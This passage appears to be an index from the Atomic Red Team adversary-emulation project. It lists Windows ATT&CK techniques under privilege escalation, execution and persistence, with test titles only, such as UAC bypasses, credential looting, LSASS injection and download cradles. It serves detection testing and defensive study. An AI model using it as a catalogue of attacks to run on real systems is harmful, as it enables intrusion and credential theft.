- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
- Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# privilege-escalation
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# execution
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.007 Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md)
- Atomic Test #1: JScript execution to gather local computer information via cscript [windows]
- Atomic Test #2: JScript execution to gather local computer information via wscript [windows]
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559.002 Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- [T1204.002 User Execution: Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- [T1059.001 Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- Atomic Test #22: Abuse Nslookup with DNS Records [windows]
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
- Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
- Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
- Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
- Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1173 Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
- Atomic Test #6: Snake Malware Service Create [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
